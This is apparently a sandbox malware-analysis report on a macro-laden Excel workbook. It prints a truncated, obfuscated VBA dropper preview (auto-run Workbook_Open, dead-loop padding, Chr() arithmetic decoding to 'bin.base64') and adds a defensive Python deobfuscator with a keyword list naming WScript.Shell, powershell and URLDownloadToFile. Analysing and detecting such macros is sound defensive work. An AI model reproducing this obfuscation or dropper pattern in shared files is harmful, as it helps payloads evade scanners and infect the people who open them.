Verdict: MALICIOUS (risk score 202)

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The file contains VBA macros, including a Workbook_Open event handler, a common initial-execution technique. The macro is obfuscated in three ways: the source is padded with dead While/Wend loops whose integer conditions (e.g. While 11 = 33) are never true, one string is assembled from Chr() arithmetic, and dangerous ProgID/API names are split across short string literals. In the visible source the macro calls CreateObject on a ProgID held in a variable (not shown in the preview), calls createElement on the returned object, and sets the element's DataType to the string the Chr() arithmetic decodes to, "bin.base64". That sequence is consistent with the MSXML DOM idiom for decoding an embedded base64 blob, and the carved macro contains four long base64-like blobs, so the macro most likely decodes an embedded payload and executes it, or uses it to fetch a secondary payload; the preview is truncated before any execution call. The absence of specific IOCs and clear payload indicators limits confidence in family attribution.
Heuristics (6)

- OLE_VBA_MACROS (medium, 4 related findings): VBA macros detected. Document contains VBA macro code.
- OLE_VBA_SPLIT_KEYWORD_OBFUSCATION (critical): Dangerous API name reassembled from split string literals. VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
- OLE_VBA_WBOPEN (high): Workbook_Open macro.
- OLE_VBA_CREATEOBJ (high): CreateObject call.
- OLE_VBA_PCODE_AUTOEXEC_EXEC (high): VBA p-code auto-exec with execution tokens. The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- EXTRACTED_FILE_STATIC_TRIAGE (info): Suspicious extracted artifact. One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11271 bytes | 06fb008fe9cc9df6cf41ea48895bdbfa34765ab98e9e1e0b635b62562c851db1 |

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 4 long base64-like blobs)
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
XSbA.du4rzj4tnqkRFHJjG4s9
While 11 = 33
Dim QmFxUrOgl_1_8_r As Boolean
Wend
Dim nvtkSfhDakCrT As Worksheet
While 9 = 44
Dim xBP_EZ91nEVFSV As Boolean
Wend
Dim FmzfTEYexVQX As Worksheet
While 8 = 58
Dim bshnKR_5rjr As Boolean
Wend
Dim v8f_19oWd_H As Worksheet
While 6 = 30
Dim ZZj_rk4RL4vp As Boolean
Wend
Dim OQ_3DEXnf5Dgw_g As Worksheet
While 13 = 42
Dim eG9wXSQGCE As Boolean
Wend
Dim jW_XVx_Phti9v As Worksheet
While 11 = 33
Dim SWjc4efg4eV As Boolean
Wend
Dim v_48Pn7H6vbr As Worksheet
While 14 = 51
Dim XNHEDONT8eUoXx As Boolean
Wend
Dim yWleho1llQ4A As Worksheet
While 6 = 33
Dim vYC_zoKMuXbPn As Boolean
Wend
Dim JXOsNhbxifYLwz As Worksheet
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "XSbA"
Dim gzj1oriaM6PdEEVCNf9DNxGcMFhRMo83yp1zGyMeLZYo48_uN2TQRbasqEmhIPMg8WoXMe5YRb1xWbiOAvCTToiUMGGAKnU6L1qeQpgs749ykmT As String
Dim r4XsLSmImiGRB9wl2wDsvNXS7P2XQdFVmToVqrfOfYz9kNi8Iekctb1cdDu6ZM1GaunqRZ5IOwKVWXqrp3Nv3mlJbK1l6iyRgq As String
Dim Zbh57O6gqs9ANu8_eVHPKFGI6gFGauPKwo7cF12dp3nO_iq86uS2wrwRTW9YHx_6awMiwc3ndmiRb2IUyHKpZXXD2mHr2bU2wqwKUGIb1oVHHdzaMli_kXdCXIpISJuBQqdt_7_p8syuAN5WvqdN2 As String
Dim XyyL7RV5vIgPQfjrOTnyhv4K_q_lOqBWhJOkq2NjOzOo2SkoyRCRJ7xl5lKNQto_FHqFP8_V_DireN As Integer
Function ul1KBOTggbTyslkkMCPApMUhnag_L3lvByYj4LYARmzwW(QxMp6_1Ihq1tJJGhEpnUC1xycEAb2bNEI_jm8THBW_rSgn4Us8De2zVZ9XKz9XPEatiJiditgk77GcPyKn)
While 17 = 50
Dim hiScZYfHKP1 As Boolean
Wend
Dim UT8yw7TtU_D As Worksheet
While 8 = 55
Dim h7Y9X3yxx1wmY As Boolean
Wend
Dim F1kOwict7F As Worksheet
Dim IoBHa5Kvr7a3LKUFolNlbzeJ4grlaQR9NytanbjHiKjMHeGl_juGvqlSHzN3KhSYnamVZ3aLBECOOQAXYEg1fJLgLZ
While 17 = 50
Dim HZWT5IBNCdA As Boolean
Wend
Dim UDZ_lRVb9h As Worksheet
While 5 = 41
Dim ph4oEschZjx_Q As Boolean
Wend
Dim z8ec3nygi53uw As Worksheet
Dim d54fsaWrhTWycUcO7bCdbHFcxQoTWbIqwS3gDIs_Bi55GqlB_u9RJkXUxZqZuBS
While 26 = 50
Dim IOIOEP7ha1cnyY As Boolean
Wend
Dim hpl4LTviBFycxI_ As Worksheet
While 15 = 49
Dim Em_4RhMWIcf As Boolean
Wend
Dim CsXEBxCMP17_ As Worksheet
While 28 = 53
Dim pY_iLCZkbvgTMb As Boolean
Wend
Dim tfzSQaYoQBJ5D_ As Worksheet
While 10 = 55
Dim Zi3HHlSdQ8_Ts As Boolean
Wend
Dim DOKC2hDfV6hej As Worksheet
Set d54fsaWrhTWycUcO7bCdbHFcxQoTWbIqwS3gDIs_Bi55GqlB_u9RJkXUxZqZuBS = CreateObject(r4XsLSmImiGRB9wl2wDsvNXS7P2XQdFVmToVqrfOfYz9kNi8Iekctb1cdDu6ZM1GaunqRZ5IOwKVWXqrp3Nv3mlJbK1l6iyRgq)
While 15 = 31
Dim F8XQ8YJ23WJjHON As Boolean
Wend
Dim S7qgkBzFCe As Worksheet
While 10 = 32
Dim K7jmBRVRiq As Boolean
Wend
Dim VSpJVw1PYxQdkk As Worksheet
gzj1oriaM6PdEEVCNf9DNxGcMFhRMo83yp1zGyMeLZYo48_uN2TQRbasqEmhIPMg8WoXMe5YRb1xWbiOAvCTToiUMGGAKnU6L1qeQpgs749ykmT = Chr(307 - 209) & Chr(414 - 309) & Chr(422 - 312) & Chr(372 - 326) & Chr(388 - 290) & Chr(216 - 119) & Chr(341 - 226) & Chr(125 - 24) & Chr(397 - 343) & Chr(122 - 70)
While 12 = 55
Dim wCX_GPNbcP As Boolean
Wend
Dim p6wghz25Qli As Worksheet
While 24 = 37
Dim WzYoBOu_Gkp As Boolean
Wend
Dim T9y84QJRb3 As Worksheet
Set IoBHa5Kvr7a3LKUFolNlbzeJ4grlaQR9NytanbjHiKjMHeGl_juGvqlSHzN3KhSYnamVZ3aLBECOOQAXYEg1fJLgLZ = d54fsaWrhTWycUcO7bCdbHFcxQoTWbIqwS3gDIs_Bi55GqlB_u9RJkXUxZqZuBS.createElement("NfVgWL3LQwRJE")
While 3 = 45
Dim yYdY9Srh5UL9AXK As Boolean
Wend
Dim X_AcVUn9jxqi As Worksheet
While 27 = 53
Dim is9HpgZ5NC5Bf As Boolean
Wend
Dim KNcU7Yv52EQ8fct As Worksheet
IoBHa5Kvr7a3LKUFolNlbzeJ4grlaQR9NytanbjHiKjMHeGl_juGvqlSHzN3KhSYnamVZ3aLBECOOQAXYEg1fJLgLZ.DataType = gzj1oria
... (truncated)
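The three obfuscation tricks visible in the preview (always-false While/Wend padding, Chr(a - b) arithmetic, and keywords split across short literals) are mechanical enough to undo statically. The following Python script is an added example written for this page; it is not the analyzer's code and not the sample's. It runs on a constructed VBA snippet (embedded below and labelled as such) that reuses the Chr() expression from the preview and the keyword list from the OLE_VBA_SPLIT_KEYWORD_OBFUSCATION rule, and it reports which dangerous names exist only after reassembly, which is exactly the condition that rule keys on. Point it at the carved macros.bas to see the same three passes on the real source.

```python
import re

# Constructed sample for this example (not the analysed document's code). It
# reproduces the tricks visible in the preview above: a dead While/Wend loop
# with an always-false integer test, the Chr(a - b) arithmetic, and ProgIDs
# split across short string literals (including a " & _" line continuation).
SAMPLE_VBA = '''
Private Sub workbook_open()
    While 11 = 33
        Dim QmFxUrOgl As Boolean
    Wend
    enc = Chr(307 - 209) & Chr(414 - 309) & Chr(422 - 312) & Chr(372 - 326) & Chr(388 - 290) & Chr(216 - 119) & Chr(341 - 226) & Chr(125 - 24) & Chr(397 - 343) & Chr(122 - 70)
    Set fso = CreateObject("Scripting.File" & "SystemObject")
    Set sh = CreateObject("WScr" & "ipt.S" & _
                          "hell")
End Sub
'''

# Keywords from the OLE_VBA_SPLIT_KEYWORD_OBFUSCATION description, plus
# "bin.base64", the value the Chr() arithmetic in the preview decodes to.
DANGEROUS = ("Scripting.FileSystemObject", "WScript.Shell", "powershell",
             "URLDownloadToFile", "bin.base64")

DEAD_WHILE = re.compile(r"^\s*While\s+(\d+)\s*=\s*(\d+)\s*$", re.I)
WEND = re.compile(r"^\s*Wend\s*$", re.I)
CHR_CALL = re.compile(r"\bChrW?\$?\(\s*(\d+)(?:\s*([-+])\s*(\d+))?\s*\)", re.I)
STRING_LIT = re.compile(r'"((?:[^"]|"")*)"')
LIT_CONCAT = re.compile(r'"((?:[^"]|"")*)"\s*&\s*_?\s*"((?:[^"]|"")*)"')


def strip_dead_loops(src: str) -> str:
    """Drop 'While <a> = <b> ... Wend' blocks whose integer test can never be true."""
    out, skipping = [], False
    for line in src.splitlines():
        if skipping:
            skipping = not WEND.match(line)   # drop everything up to and including Wend
            continue
        m = DEAD_WHILE.match(line)
        if m and int(m.group(1)) != int(m.group(2)):
            skipping = True
            continue
        out.append(line)
    return "\n".join(out)


def fold_chr(src: str) -> str:
    """Replace Chr(n), Chr(a - b) and Chr(a + b) with the literal character."""
    def repl(m):
        code = int(m.group(1))
        if m.group(2):
            code = code - int(m.group(3)) if m.group(2) == "-" else code + int(m.group(3))
        if not 32 <= code < 127:
            return m.group(0)              # keep non-printables as the original call
        ch = chr(code)
        return '"' + ('""' if ch == '"' else ch) + '"'   # VBA escapes " as ""
    return CHR_CALL.sub(repl, src)


def join_literals(src: str) -> str:
    """Fold "ab" & "cd" (also across " & _" line continuations) into "abcd"."""
    prev = None
    while prev != src:                     # repeat until no adjacent pair is left
        prev = src
        src = LIT_CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', src)
    return src


def deobfuscate(src: str) -> str:
    return join_literals(fold_chr(strip_dead_loops(src)))


def reassembled_keywords(src: str, keywords=DANGEROUS) -> set:
    """Keywords present in a literal only after folding, i.e. in no single literal
    of the original source: the condition OLE_VBA_SPLIT_KEYWORD_OBFUSCATION keys on."""
    raw = [s.lower() for s in STRING_LIT.findall(src)]
    folded = [s.lower() for s in STRING_LIT.findall(deobfuscate(src))]
    return {k for k in keywords
            if any(k.lower() in s for s in folded) and not any(k.lower() in s for s in raw)}


if __name__ == "__main__":
    print(deobfuscate(SAMPLE_VBA))
    print("reassembled:", sorted(reassembled_keywords(SAMPLE_VBA)))
```

The passes are ordered so that each one exposes input for the next: dead-loop removal only shrinks the text, Chr() folding turns arithmetic into one-character literals, and the concatenation pass then merges those with the split literals. A keyword that is found in the folded output but in no raw literal is the signal worth alerting on; a keyword already present as one literal is ordinary (if still suspicious) macro code and is reported by the plain OLE_VBA_CREATEOBJ-style rules instead.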